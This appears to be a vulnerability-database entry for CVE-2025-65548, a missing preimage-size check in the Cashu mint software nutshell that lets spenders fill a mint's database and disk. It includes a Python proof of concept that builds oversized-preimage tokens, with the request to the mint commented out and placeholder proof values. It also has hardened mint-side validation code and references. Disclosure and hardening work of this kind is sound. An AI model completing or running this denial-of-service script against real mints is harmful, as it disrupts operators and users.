Security Vulnerability Report
CVE-2025-65548 CVSS 9.1 CRITICAL

Published: 2025-12-08 19:15:51
Last Modified: 2025-12-15 15:56:45

Description

NUT-14 allows Cashu tokens to be created with a preimage hash. However, nutshell (cashubtc/nuts) before 0.18.0 does not validate the size of the preimage when the token is spent. The preimage is stored by the mint, and an attacker can exploit this vulnerability to fill the mint's database and disk with arbitrary data.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploitability Score: 3.9
Impact Score: 5.2

Configurations (Affected Products)

cpe:2.3:a:cashu:nutshell:*:*:*:*:*:*:*:* - VULNERABLE
nutshell < 0.18.0
cashubtc/nuts < 0.18.0
All unpatched Cashu mint implementations that implement NUT-14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65548 PoC - Cashu Token Preimage Size Validation Bypass
Note: This PoC is for educational and security research purposes only.
"""
import json
import hashlib
import base64


def generate_malicious_token(preimage_size_mb=100):
    """Generate a Cashu token with an oversized preimage."""
    # Generate arbitrary large preimage data
    preimage = b'\x00' * (preimage_size_mb * 1024 * 1024)
    preimage_hash = hashlib.sha256(preimage).hexdigest()
    # Construct NUT-14 token with oversized preimage
    token = {
        "mint": "https://your-mint.example.com",
        "proofs": [
            {
                "amount": 1,
                "C": "02" + "00" * 32,  # Dummy C value
                "secret": "preimage:" + preimage_hash,
                "preimage": base64.b64encode(preimage).decode(),  # Oversized preimage
                "id": "nut14-proof-id",
            }
        ],
    }
    return token


def exploit_mint(mint_url, num_tokens=10, preimage_size_mb=100):
    """Exploit the mint by sending tokens with oversized preimages."""
    print(f"[*] Generating {num_tokens} malicious tokens...")
    print(f"[*] Preimage size: {preimage_size_mb}MB per token")
    print(f"[*] Total potential data to fill: {num_tokens * preimage_size_mb}MB")
    for i in range(num_tokens):
        token = generate_malicious_token(preimage_size_mb)
        # In a real attack, the token would be sent to the mint's /split or /melt endpoint
        print(f"[+] Token {i+1}/{num_tokens} generated and ready to send")
        # requests.post(f"{mint_url}/api/v1/split", json=token)
    print("[*] Attack completed - mint should have consumed significant disk space")


if __name__ == "__main__":
    print("CVE-2025-65548 PoC - Cashu NUT-14 Preimage Size Validation Bypass")
    print("=" * 70)
    # Example usage
    exploit_mint("https://vulnerable-mint.example.com", num_tokens=100, preimage_size_mb=10)
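The mint-side counterpart, added here as an example and not taken from nutshell or from the PoC above: a spend-time preimage check that only compares hashes (the behaviour the description attributes to versions before 0.18.0) beside a hardened check that bounds the encoded length before decoding, hashing or storing anything. It assumes an HTLC secret of the NUT-10 form `["HTLC", {"nonce": ..., "data": <sha256 hex>}]` and a fixed 32-byte preimage as NUT-14 specifies; the secret layout, nonce and witness values are constructed.

```python
import hashlib
import json

# Assumption (per NUT-14): the HTLC preimage is exactly 32 bytes, hex encoded.
PREIMAGE_BYTES = 32


def make_htlc_secret(preimage: bytes) -> str:
    """Constructed NUT-10 style secret: ["HTLC", {...}] locked to sha256(preimage)."""
    body = {"nonce": "00" * 16, "data": hashlib.sha256(preimage).hexdigest()}
    return json.dumps(["HTLC", body])


def lock_hash(secret: str) -> str:
    """Extract the hash lock from an HTLC secret; reject any other kind."""
    kind, body = json.loads(secret)
    if kind != "HTLC":
        raise ValueError("not an HTLC secret")
    return body["data"]


def verify_preimage_vulnerable(secret: str, preimage_hex: str) -> bool:
    """Pre-0.18.0 style check: compares only the hash, so a preimage of any
    size that the spender hashed into the lock passes and is then stored."""
    return hashlib.sha256(bytes.fromhex(preimage_hex)).hexdigest() == lock_hash(secret)


def verify_preimage_hardened(secret: str, preimage_hex: str) -> bool:
    """Bound the encoded length first, so oversized or malformed witnesses are
    refused before anything is decoded, hashed or written to the database."""
    if len(preimage_hex) != 2 * PREIMAGE_BYTES:
        return False
    try:
        preimage = bytes.fromhex(preimage_hex)
    except ValueError:
        return False
    return hashlib.sha256(preimage).hexdigest() == lock_hash(secret)


if __name__ == "__main__":
    # Constructed witness values: a legitimate 32-byte preimage and an oversized one.
    good = b"\x11" * PREIMAGE_BYTES
    oversized = b"\x00" * (64 * 1024)
    for label, pre in (("32-byte", good), ("64 KiB", oversized)):
        secret = make_htlc_secret(pre)
        print(label, "vulnerable:", verify_preimage_vulnerable(secret, pre.hex()),
              "hardened:", verify_preimage_hardened(secret, pre.hex()))
```

The length check runs on the hex string before `bytes.fromhex`, so an oversized witness costs the mint a single comparison rather than a decode, a hash and a database write.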

References

Weakness: CWE-1284 (Improper Validation of Specified Quantity in Input)

https://bitcointalk.org/index.php?topic=5564329 (Exploit, Issue Tracking)
https://delvingbitcoin.org/t/public-disclosure-denial-of-service-using-htlc-in-cashu/2090 (Broken Link)
https://github.com/cashubtc/nuts/blob/main/07.md (Exploit, Third Party Advisory)
https://github.com/cashubtc/nuts/blob/main/14.md (Exploit, Third Party Advisory)
https://github.com/jamesob/delving-bitcoin-archive/blob/master/archive/rendered-topics/2025-11-November/2025-11-02-public-disclosure-denial-of-service-using-htlc-in-cashu-id2090.md (Exploit, Third Party Advisory)
https://preimage007.github.io/ (Product)